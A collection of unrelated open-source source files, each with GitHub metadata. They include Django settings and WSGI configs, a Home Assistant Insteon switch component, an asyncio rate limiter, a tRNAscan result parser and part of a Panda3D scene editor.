"""Convert an ISO8601 to a datetime.
Args:
str(string): The ISO8601 formatted string to convert
Returns:
A :class:`datetime` object representing the given time
"""
try:
return datetime.strptime(str, "%Y-%m-%dT%H:%M:%S.%fZ")
except ValueError:
return datetime.strptime(str, "%Y-%m-%dT%H:%M:%SZ")
def to_iso_date(timestamp):
"""Convert a UTC timestamp to an ISO8601 string.
datetime instances can be constructed in alternate timezones. This
function assumes that the given timestamp is in the UTC timezone.
Args:
timestamp(datetime): A datetime object in the UTC timezone.
Returns:
An ISO8601 formatted string representing the timestamp.
"""
return timestamp.isoformat() + 'Z'
def build_request_body(type, id, attributes=None, relationships=None):
"""Build a request body object.
A body JSON object is used for any of the ``update`` or ``create``
methods on :class:`Resource` subclasses. In normal library use you
should not have to use this function directly.
Args:
type(string): The resource type for the attribute
id(uuid): The id of the object to update. This may be ``None``
Keyword Args:
attributes(dict): A JSON dictionary of the attributes to set
relationships(dict) A JSON dictionary of relationships to set
Returns:
A valid attribute dictionary. Often used in the ``update`` or
``create`` :class:`Resource`` methods.
"""
result = {
"data": {
"type": type
}
}
data = result['data']
if attributes is not None:
data['attributes'] = attributes
if relationships is not None:
data['relationships'] = relationships
if id is not None:
data['id'] = id
return result
def build_request_relationship(type, ids):
"""Build a relationship list.
A relationship list is used to update relationships between two
resources. Setting sensors on a label, for example, uses this
function to construct the list of sensor ids to pass to the Helium
API.
Args:
type(string): The resource type for the ids in the relationship
ids([uuid] or uuid): Just one or a list of resource uuids to use
in the relationship
Returns:
A ready to use relationship JSON object.
"""
if ids is None:
return {
'data': None
}
elif isinstance(ids, str):
return {
'data': {'id': ids, 'type': type}
}
else:
return {
"data": [{"id": id, "type": type} for id in ids]
}
def build_request_include(include, params):
"""Augment request parameters with includes.
When one or all resources are requested an additional set of
resources can be requested as part of the request. This function
extends the given parameters for a request with a list of resource
types passed in as a list of :class:`Resource` subclasses.
Args:
include([Resource class]): A list of resource classes to include
params(dict): The (optional) dictionary of request parameters to extend
Returns:
An updated or new dictionary of parameters extended with an
include query parameter.
"""
params = params or OrderedDict()
if include is not None:
params['include'] = ','.join([cls._resource_type() for cls in include])
return params
| {
"content_hash": "a44cad02f8a303b33c22a63318237911",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 79,
"avg_line_length": 26.489208633093526,
"alnum_prop": 0.6409560021727322,
"repo_name": "helium/helium-python",
"id": "126b364f1b29dfa20fdf5cf6ddb05f54a7783c69",
"size": "3682",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "helium/util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "108839"
}
],
"symlink_target": ""
} |
"""
WSGI config for tracebin project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# This is env dependent, set it yourself.
# os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tracebin_server.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| {
"content_hash": "860dfa013667cc61240e3540e0c912d1",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 79,
"avg_line_length": 41,
"alnum_prop": 0.7973086627417998,
"repo_name": "alex/tracebin",
"id": "c2a95cb45c44d67304990449163dd6103401dbd8",
"size": "1189",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/tracebin_server/wsgi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "7712"
},
{
"name": "Python",
"bytes": "96821"
}
],
"symlink_target": ""
} |
'''
Created on Aug 30, 2012
@author: vencax
'''
import re
import string
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.forms.widgets import Textarea
from .models import PC
mac_re = re.compile(r'([0-9A-Fa-f]{2}[:-]?){5}([0-9A-Fa-f]{2})')
class MyPCAdminForm(forms.ModelForm):
class Meta:
model = PC
mac = forms.CharField(widget=Textarea)
def clean_mac(self):
mac = self.cleaned_data['mac']
if not mac_re.search(mac):
raise ValidationError(_('incorect mac address'))
cleaned = ''
for l in mac:
if l in string.hexdigits:
cleaned += l
return cleaned
| {
"content_hash": "fcbeaf73b0c29956378a2097a2db7b1d",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 64,
"avg_line_length": 20.944444444444443,
"alnum_prop": 0.629973474801061,
"repo_name": "stare-vaskoviny/django-dhcp-admin",
"id": "4ea2f6c9259387af1d600109b55db7572f839fc8",
"size": "754",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dhcp_admin/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "5040"
}
],
"symlink_target": ""
} |
from .base import * # NOQA
import sys
import logging.config
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATES[0]['OPTIONS'].update({'debug': True})
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if "celery" in sys.argv[0]:
DEBUG = False
# Django Debug Toolbar
INSTALLED_APPS += (
'debug_toolbar.apps.DebugToolbarConfig',
'django_filters',
'core',
'bootstrap3',
'select_multiple_field',
'adv_cache_tag',
'cacheops',
'rating',
'guardian',
'pure_pagination',
'spurl', # URL manipulation
'artist',
'album',
'song',
'videos',
'news',
'allauth_core',
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.facebook',
)
# Show emails to console in DEBUG mode
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Show thumbnail generation errors
THUMBNAIL_DEBUG = True
# Log everything to the logs directory at the top
LOGFILE_ROOT = join(dirname(BASE_DIR), 'logs')
# Reset logging
# (see http://www.caktusgroup.com/blog/2015/01/27/Django-Logging-Configuration-logging_config-default-settings-logger/)
LOGGING_CONFIG = None
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s] %(levelname)s [%(pathname)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'django_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'django.log'),
'formatter': 'verbose'
},
'proj_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'project.log'),
'formatter': 'verbose'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'django': {
'handlers': ['django_log_file'],
'propagate': True,
'level': 'DEBUG',
},
'project': {
'handlers': ['proj_log_file'],
'level': 'DEBUG',
},
'werkzeug': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
}
}
logging.config.dictConfig(LOGGING)
SITE_ID = 1
AUTHENTICATION_BACKENDS = (
# Needed to login by username in Django admin, regardless of `allauth`
'django.contrib.auth.backends.ModelBackend',
# `allauth` specific authentication methods, such as login by e-mail
'allauth.account.auth_backends.AuthenticationBackend',
'guardian.backends.ObjectPermissionBackend',
)
ACCOUNT_USER_MODEL_USERNAME_FIELD = None
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_AUTHENTICATION_METHOD = 'email'
SOCIALACCOUNT_AUTO_SIGNUP = False
# LOGIN_REDIRECT_URL = ''
SOCIALACCOUNT_QUERY_EMAIL = True
ACCOUNT_LOGIN_ON_PASSWORD_RESET = True
ACCOUNT_LOGOUT_ON_PASSWORD_CHANGE = True
ACCOUNT_SIGNUP_FORM_CLASS = 'profiles.forms.MyCustomSignupForm'
ACCOUNT_USER_DISPLAY = lambda user: user.get_full_name() or user.email
SOCIALACCOUNT_EMAIL_VERIFICATION = "none"
ACCOUNT_FORMS = {
'login': 'allauth_core.forms.MyLoginForm',
'signup': 'allauth_core.forms.MySignupForm',
'add_email': 'allauth_core.forms.MyEmail',
'change_password': 'allauth_core.forms.MyPasswordChangeForm',
'reset_password': 'allauth_core.forms.MyPasswordResetForm',
'set_password': 'allauth_core.forms.MySetPasswordForm',
'reset_password_from_key': 'allauth_core.forms.MyResetPasswordKeyForm'
}
SOCIALACCOUNT_FORMS = {
'signup': 'allauth_core.forms.MySocialSignupForm'
}
PAGINATION_SETTINGS = {
'PAGE_RANGE_DISPLAYED': 6,
'MARGIN_PAGES_DISPLAYED': 3,
}
GUARDIAN_GET_INIT_ANONYMOUS_USER = 'accounts.models.get_anonymous_user_instance'
# GUARDIAN_MONKEY_PATCH = False
| {
"content_hash": "14249637e98253c6f781348aceb2d1c3",
"timestamp": "",
"source": "github",
"line_count": 152,
"max_line_length": 119,
"avg_line_length": 27.776315789473685,
"alnum_prop": 0.6210326859308385,
"repo_name": "contactr2m/remote_repo",
"id": "d6fe9363913ca1e197f9cfea5086591c9a4e09ab",
"size": "4222",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Pop_Lyrics_Beta/settings/development.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "44476"
},
{
"name": "HTML",
"bytes": "97064"
},
{
"name": "JavaScript",
"bytes": "363"
},
{
"name": "Python",
"bytes": "118257"
}
],
"symlink_target": ""
} |
"""
WSGI config for project_name project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE',
'{{ project_name }}.conf.settings')
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
| {
"content_hash": "5f861ed985550acdc6562aac5bff9861",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 78,
"avg_line_length": 28.8,
"alnum_prop": 0.7245370370370371,
"repo_name": "bruth/wicked-django-template",
"id": "fc06ded7ad59b98ee2b04345c7409265888ebfd1",
"size": "432",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wsgi.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "179928"
},
{
"name": "CoffeeScript",
"bytes": "11209"
},
{
"name": "HTML",
"bytes": "6666"
},
{
"name": "JavaScript",
"bytes": "776389"
},
{
"name": "Python",
"bytes": "24812"
}
],
"symlink_target": ""
} |
"""
Support for Insteon switch devices via local hub support.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/switch.insteon_local/
"""
import json
import logging
import os
from datetime import timedelta
from homeassistant.components.switch import SwitchDevice
from homeassistant.loader import get_component
import homeassistant.util as util
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['insteon_local']
DOMAIN = 'switch'
INSTEON_LOCAL_SWITCH_CONF = 'insteon_local_switch.conf'
MIN_TIME_BETWEEN_FORCED_SCANS = timedelta(milliseconds=100)
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=10)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Insteon local switch platform."""
insteonhub = hass.data['insteon_local']
conf_switches = config_from_file(hass.config.path(
INSTEON_LOCAL_SWITCH_CONF))
if len(conf_switches):
for device_id in conf_switches:
setup_switch(
device_id, conf_switches[device_id], insteonhub, hass,
add_devices)
else:
linked = insteonhub.get_linked()
for device_id in linked:
if linked[device_id]['cat_type'] == 'switch'\
and device_id not in conf_switches:
request_configuration(device_id, insteonhub,
linked[device_id]['model_name'] + ' ' +
linked[device_id]['sku'],
hass, add_devices)
def request_configuration(device_id, insteonhub, model, hass,
add_devices_callback):
"""Request configuration steps from the user."""
configurator = get_component('configurator')
# We got an error if this method is called while we are configuring
if device_id in _CONFIGURING:
configurator.notify_errors(
_CONFIGURING[device_id], 'Failed to register, please try again.')
return
def insteon_switch_config_callback(data):
"""The actions to do when our configuration callback is called."""
setup_switch(device_id, data.get('name'), insteonhub, hass,
add_devices_callback)
_CONFIGURING[device_id] = configurator.request_config(
hass, 'Insteon Switch ' + model + ' addr: ' + device_id,
insteon_switch_config_callback,
description=('Enter a name for ' + model + ' addr: ' + device_id),
entity_picture='/static/images/config_insteon.png',
submit_caption='Confirm',
fields=[{'id': 'name', 'name': 'Name', 'type': ''}]
)
def setup_switch(device_id, name, insteonhub, hass, add_devices_callback):
"""Set up the switch."""
if device_id in _CONFIGURING:
request_id = _CONFIGURING.pop(device_id)
configurator = get_component('configurator')
configurator.request_done(request_id)
_LOGGER.info("Device configuration done!")
conf_switch = config_from_file(hass.config.path(INSTEON_LOCAL_SWITCH_CONF))
if device_id not in conf_switch:
conf_switch[device_id] = name
if not config_from_file(
hass.config.path(INSTEON_LOCAL_SWITCH_CONF), conf_switch):
_LOGGER.error("Failed to save configuration file")
device = insteonhub.switch(device_id)
add_devices_callback([InsteonLocalSwitchDevice(device, name)])
def config_from_file(filename, config=None):
"""Small configuration file management function."""
if config:
# We're writing configuration
try:
with open(filename, 'w') as fdesc:
fdesc.write(json.dumps(config))
except IOError as error:
_LOGGER.error("Saving configuration file failed: %s", error)
return False
return True
else:
# We're reading config
if os.path.isfile(filename):
try:
with open(filename, 'r') as fdesc:
return json.loads(fdesc.read())
except IOError as error:
_LOGGER.error("Reading config file failed: %s", error)
# This won't work yet
return False
else:
return {}
class InsteonLocalSwitchDevice(SwitchDevice):
"""An abstract Class for an Insteon node."""
def __init__(self, node, name):
"""Initialize the device."""
self.node = node
self.node.deviceName = name
self._state = False
@property
def name(self):
"""Return the the name of the node."""
return self.node.deviceName
@property
def unique_id(self):
"""Return the ID of this Insteon node."""
return 'insteon_local_{}'.format(self.node.device_id)
@util.Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
def update(self):
"""Get the updated status of the switch."""
resp = self.node.status(0)
if 'cmd2' in resp:
self._state = int(resp['cmd2'], 16) > 0
@property
def is_on(self):
"""Return the boolean response if the node is on."""
return self._state
def turn_on(self, **kwargs):
"""Turn device on."""
self.node.on()
self._state = True
def turn_off(self, **kwargs):
"""Turn device off."""
self.node.off()
self._state = False
| {
"content_hash": "c8ef36a9ce85f36bc5ce2694dc9ca2ec",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 33.4320987654321,
"alnum_prop": 0.6100443131462334,
"repo_name": "keerts/home-assistant",
"id": "6935ad21abe0f6af6022da0d9cb97190a37b1663",
"size": "5416",
"binary": false,
"copies": "6",
"ref": "refs/heads/dev",
"path": "homeassistant/components/switch/insteon_local.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "1546272"
},
{
"name": "Python",
"bytes": "5270263"
},
{
"name": "Ruby",
"bytes": "379"
},
{
"name": "Shell",
"bytes": "14079"
}
],
"symlink_target": ""
} |
import sys
from setuptools import setup
from setuptools import find_packages
version = '0.2.0.dev0'
install_requires = [
# load_pem_private/public_key (>=0.6)
# rsa_recover_prime_factors (>=0.8)
'cryptography>=0.8',
'ndg-httpsclient', # urllib3 InsecurePlatformWarning (#304)
'pyasn1', # urllib3 InsecurePlatformWarning (#304)
# Connection.set_tlsext_host_name (>=0.13), X509Req.get_extensions (>=0.15)
'PyOpenSSL>=0.15',
'pyrfc3339',
'pytz',
'requests',
'setuptools', # pkg_resources
'six',
'werkzeug',
]
# env markers in extras_require cause problems with older pip: #517
if sys.version_info < (2, 7):
install_requires.extend([
# only some distros recognize stdlib argparse as already satisfying
'argparse',
'mock<1.1.0',
])
else:
install_requires.append('mock')
docs_extras = [
'Sphinx>=1.0', # autodoc_member_order = 'bysource', autodoc_default_flags
'sphinx_rtd_theme',
'sphinxcontrib-programoutput',
]
testing_extras = [
'nose',
'tox',
]
setup(
name='acme',
version=version,
description='ACME protocol implementation in Python',
url='https://github.com/letsencrypt/letsencrypt',
author="Let's Encrypt Project",
author_email='[email protected]',
license='Apache License 2.0',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Security',
],
packages=find_packages(),
include_package_data=True,
install_requires=install_requires,
extras_require={
'docs': docs_extras,
'testing': testing_extras,
},
entry_points={
'console_scripts': [
'jws = acme.jose.jws:CLI.run',
],
},
test_suite='acme',
)
| {
"content_hash": "3476e1eb26dd3af535fa3b029fb2ae9a",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 79,
"avg_line_length": 27,
"alnum_prop": 0.608656849620705,
"repo_name": "goofwear/letsencrypt",
"id": "e35b40d6e2ff0e9f839b4f9000d1fb7d19501abf",
"size": "2241",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "acme/setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "14147"
},
{
"name": "Augeas",
"bytes": "4729"
},
{
"name": "Batchfile",
"bytes": "35037"
},
{
"name": "DIGITAL Command Language",
"bytes": "133"
},
{
"name": "Groff",
"bytes": "222"
},
{
"name": "Makefile",
"bytes": "37309"
},
{
"name": "Nginx",
"bytes": "4274"
},
{
"name": "Python",
"bytes": "1234907"
},
{
"name": "Shell",
"bytes": "26945"
}
],
"symlink_target": ""
} |
from asyncio import Lock, sleep
from time import time
class AsyncFrequency(object):
"""AsyncFrequency controller, means concurrent running n tasks every interval seconds.
Basic Usage::
from torequests.frequency_controller.async_tools import AsyncFrequency
from asyncio import ensure_future, get_event_loop
from time import time
async def test_async():
frequency = AsyncFrequency(2, 1)
async def task():
async with frequency:
return time()
now = time()
tasks = [ensure_future(task()) for _ in range(5)]
result = [await task for task in tasks]
assert result[0] - now < 1
assert result[1] - now < 1
assert result[2] - now > 1
assert result[3] - now > 1
assert result[4] - now > 2
assert frequency.to_dict() == {'n': 2, 'interval': 1}
assert frequency.to_list() == [2, 1]
get_event_loop().run_until_complete(test_async())
"""
__slots__ = ("gen", "__aenter__", "repr", "_lock", "n", "interval")
TIMER = time
def __init__(self, n=None, interval=0):
self.n = n
self.interval = interval
if n:
self.gen = self.generator(n, interval)
self._lock = None
self.__aenter__ = self._acquire
self.repr = f"AsyncFrequency({n}, {interval})"
else:
self.gen = None
self.__aenter__ = self.__aexit__
self.repr = "AsyncFrequency(unlimited)"
def to_list(self):
"""Return the [self.n, self.interval]"""
return [self.n, self.interval]
def to_dict(self):
"""Return the dict {'n': self.n, 'interval': self.interval}"""
return {'n': self.n, 'interval': self.interval}
@property
def lock(self):
# lazy init loop
if self._lock is None:
self._lock = Lock()
return self._lock
async def generator(self, n, interval):
q = [0] * n
while 1:
for index, i in enumerate(q):
# or timeit.default_timer()
now = self.TIMER()
diff = now - i
if diff < interval:
await sleep(interval - diff)
now = self.TIMER()
q[index] = now
# python3.8+ need lock for generator contest, 3.6 3.7 not need
yield now
@classmethod
def ensure_frequency(cls, frequency):
"""Ensure the given args is AsyncFrequency.
:param frequency: args to create a AsyncFrequency instance.
:type frequency: AsyncFrequency / dict / list / tuple
:return: AsyncFrequency instance
:rtype: AsyncFrequency
"""
if isinstance(frequency, cls):
return frequency
elif isinstance(frequency, dict):
return cls(**frequency)
else:
return cls(*frequency)
async def _acquire(self):
async with self.lock:
return await self.gen.asend(None)
async def __aexit__(self, *args):
pass
def __str__(self):
return repr(self)
def __repr__(self):
return self.repr
def __bool__(self):
return bool(self.gen)
| {
"content_hash": "b80d94ddd9b3a9f2e45ddc50981e7f20",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 90,
"avg_line_length": 30.945454545454545,
"alnum_prop": 0.5185076380728555,
"repo_name": "ClericPy/torequests",
"id": "3500d431b53f0e0ade00c71e0eab6d849ce77f62",
"size": "3404",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "torequests/frequency_controller/async_tools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Go",
"bytes": "1052"
},
{
"name": "Python",
"bytes": "221340"
}
],
"symlink_target": ""
} |
"""
Copyright [2009-2021] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import typing as ty
import attr
from attr.validators import instance_of as is_a
from attr.validators import optional
def intron_endpoint(raw: str) -> ty.Optional[int]:
if raw == "0":
return None
return int(raw)
@attr.s()
class TRnaScanResults:
sequence_id = attr.ib(validator=is_a(str))
hit_index = attr.ib(validator=is_a(int))
sequence_start = attr.ib(validator=is_a(int))
sequence_stop = attr.ib(validator=is_a(int))
anticodon = attr.ib(validator=is_a(str))
trna_type = attr.ib(validator=is_a(str))
intron_start = attr.ib(validator=optional(is_a(int)))
intron_stop = attr.ib(validator=optional(is_a(int)))
score = attr.ib(validator=is_a(float))
note = attr.ib(validator=is_a(str))
@classmethod
def from_line(cls, line: str) -> "TRnaScanResults":
parts = [p.strip() for p in line.split("\t")]
return cls(
sequence_id=parts[0],
hit_index=int(parts[1]),
sequence_start=int(parts[2]),
sequence_stop=int(parts[3]),
anticodon=parts[5],
trna_type=parts[4],
intron_start=intron_endpoint(parts[6]),
intron_stop=intron_endpoint(parts[7]),
score=float(parts[8]),
note=parts[9],
)
@property
def is_pseduo(self) -> bool:
return "pseudo" in self.note
| {
"content_hash": "d972a475795e88b954d5feef44245bf9",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 72,
"avg_line_length": 33.758620689655174,
"alnum_prop": 0.6618998978549541,
"repo_name": "RNAcentral/rnacentral-import-pipeline",
"id": "89dd4ceb8a03ee615aae5a30b3fed39f88d438e6",
"size": "1983",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rnacentral_pipeline/databases/data/trnascan.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "18451"
},
{
"name": "Dockerfile",
"bytes": "3405"
},
{
"name": "Groovy",
"bytes": "6339"
},
{
"name": "HTML",
"bytes": "10430"
},
{
"name": "Makefile",
"bytes": "1197"
},
{
"name": "Nextflow",
"bytes": "104756"
},
{
"name": "PLpgSQL",
"bytes": "15906"
},
{
"name": "PostScript",
"bytes": "965516"
},
{
"name": "Python",
"bytes": "1623134"
},
{
"name": "Rust",
"bytes": "181197"
},
{
"name": "Shell",
"bytes": "23155"
}
],
"symlink_target": ""
} |
from google.cloud.video import stitcher_v1
def sample_update_slate():
# Create a client
client = stitcher_v1.VideoStitcherServiceClient()
# Initialize request argument(s)
request = stitcher_v1.UpdateSlateRequest(
)
# Make the request
response = client.update_slate(request=request)
# Handle the response
print(response)
# [END videostitcher_v1_generated_VideoStitcherService_UpdateSlate_sync_62ab4011]
| {
"content_hash": "34df8412998635c6e9660e7f3ae15207",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 81,
"avg_line_length": 24.666666666666668,
"alnum_prop": 0.7319819819819819,
"repo_name": "googleapis/python-video-stitcher",
"id": "8985aa3bdfa871811bca362d42e9c0d355df1fbd",
"size": "1854",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/videostitcher_v1_generated_video_stitcher_service_update_slate_sync_62ab4011.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "1027964"
},
{
"name": "Shell",
"bytes": "30684"
}
],
"symlink_target": ""
} |
import sys
try: import _tkinter
except: sys.exit("Please install python module 'Tkinter'")
import direct
from direct.directbase.DirectStart import*
from direct.showbase.TkGlobal import spawnTkLoop
from Tkinter import *
from tkFileDialog import *
from direct.directtools.DirectGlobals import *
from direct.tkwidgets.AppShell import*
from SideWindow import*
from duplicateWindow import*
from lightingPanel import *
from seMopathRecorder import *
from seSession import *
from quad import *
from sePlacer import *
from seFileSaver import *
from propertyWindow import *
import seParticlePanel
from collisionWindow import *
from direct.gui.DirectGui import *
from MetadataPanel import *
from seBlendAnimPanel import *
from controllerWindow import *
from AlignTool import *
import os
import string
from direct.tkwidgets import Dial
from direct.tkwidgets import Floater
from direct.tkwidgets import Slider
from direct.actor import Actor
import seAnimPanel
from direct.task import Task
import math
#################################################################
# All scene and windows object will be stored in here.
# So, any event which will or need to change contents
# should be wirtten in here or imported into here!
#################################################################
from dataHolder import* ## Use this thing to Save/load data.
AllScene = dataHolder()
class myLevelEditor(AppShell):
## overridden the basic app info ##
appname = 'Scene Editor - New Scene'
appversion = '1.0'
copyright = ('Copyright 2004 E.T.C. Carnegie Mellon U.' +
' All Rights Reserved')
contactname = 'Jesse Schell, Shalin Shodhan & YiHong Lin'
contactphone = '(412) 268-5791'
contactemail = '[email protected]'
frameWidth = 1024
frameHeight = 80
frameIniPosX = 0
frameIniPosY = 0
usecommandarea = 0
usestatusarea = 0
padx = 5
pady = 5
sideWindowCount = 0
## Basic World default setting (For side window)
worldColor = [0,0,0,0]
lightEnable = 1
ParticleEnable = 1
basedriveEnable = 0
collision = 1
backface = 0
texture = 1
wireframe = 0
grid = 0
widgetVis = 0
enableAutoCamera = 1
enableControl = False
controlType = 'Keyboard'
keyboardMapDict = {}
keyboardSpeedDict = {}
Scene=None
isSelect = False
nodeSelected = None
undoDic = {}
redoDic = {}
animPanel = {}
animBlendPanel = {}
propertyWindow = {}
CurrentFileName=None #Holds the current scene file name
CurrentDirName=None # Holds the current file name without extension which is the path where file's data gets saved
Dirty=0 # Keeps track of whether there are any modifications that should be saved
def __init__(self, parent = None, **kw):
base.setBackgroundColor(0,0,0)
self.parent = parent
## Check TkTool is activated! ##
self.wantTK = config.GetBool('want-tk', 0)
if self.wantTK:
pass
else:
taskMgr.remove('tkloop')
spawnTkLoop()
## Set up window frame
INITOPT = Pmw.INITOPT
optiondefs = (
('title', self.appname, None),
)
self.defineoptions(kw, optiondefs)
AppShell.__init__(self, parent)
self.parent.geometry('%dx%d+%d+%d' % (self.frameWidth, self.frameHeight,self.frameIniPosX,self.frameIniPosY))
###### Put th directLabel on the screen to show the selected object Data
self.posLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.90),
text = "Position : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.hprLabel = DirectLabel(
relief = None,
pos = (-1.3 , 0, 0.80),
text = "Orientation: H: 00.00 P: 00.00 R: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.scaleLabel = DirectLabel(
relief = None,
pos = (-1.3, 0, 0.70),
text = "Scale : X: 00.00 Y: 00.00 Z: 00.00",
color = Vec4(1, 1, 1, 1),
text_scale = 0.05,
text_align = TextNode.ALeft
)
self.initialiseoptions(myLevelEditor)
self.parent.resizable(False,False) ## Disable the ability to resize for this Window.
######### Set the event handler ##########
self.dataFlowEvents = [
## Event from Side Window
['SW_lightToggle',self.lightToggle],
['SW_collisionToggle',AllScene.toggleCollisionVisable],
['SW_particleToggle',self.toggleParticleVisable],
['SW_close',self.sideWindowClose],
## From Duplication Window
['DW_duplicating',self.duplicationObj],
## From Animation Panel
['AW_AnimationLoad',self.animationLoader],
['AW_removeAnim',self.animationRemove],
['AW_close',self.animPanelClose],
## From Blending Animation Window
['BAW_saveBlendAnim',self.animBlendPanelSave],
['BAW_removeBlendAnim',self.animBlendPanelRemove],
['BAW_renameBlendAnim',self.animBlendPanelRename],
['BAW_close',self.animBlendPanelClose],
## From Lighting Panel
['LP_selectLight', self.lightSelect],
['LP_addLight',self.addLight],
['LP_rename',self.lightRename],
['LP_removeLight',self.removeLight],
['LP_close',self.lightingPanelClose],
## From MotionPath Panel
['mPath_bindPathToNode',AllScene.bindCurveToNode],
['mPath_requestCurveList', self.requestCurveList],
['mPath_close', self.mopathClosed],
## From Property Window
['PW_removeCurveFromNode', AllScene.removeCurveFromNode],
['PW_removeAnimFromNode', AllScene.removeAnimation],
['PW_toggleLight', AllScene.toggleLightNode],
['PW_close', self.closePropertyWindow],
## From collisionWindow
['CW_addCollisionObj', AllScene.addCollisionObject],
## From AlignWindow
['ALW_close', self.closeAlignPanel],
['ALW_align', self.alignObject],
## From controllerWindow
['ControlW_close', self.closeInputPanel],
['ControlW_require', self.requestObjFromControlW],
['ControlW_controlSetting', self.setControlSet],
['ControlW_controlEnable', self.startControl],
['ControlW_controlDisable', self.stopControl],
['ControlW_saveSetting', AllScene.saveControlSetting],
## From Placer
['Placer_close', self.closePlacerPanel],
## From Particle Panel
['ParticlePanle_close', self.closeParticlePanel],
## From SEditor object which is a altered DirectSession
['SEditor-ToggleWidgetVis',self.toggleWidgetVis],
['SEditor-ToggleBackface',self.toggleBackface],
['SEditor-ToggleTexture',self.toggleTexture],
['SEditor-ToggleWireframe',self.toggleWireframe],
['ParticlePanel_Added_Effect',self.addParticleEffect],
['f11',self.loadFromBam],
['f12',self.saveAsBam],
]
#################################
### Collision detection
#################################
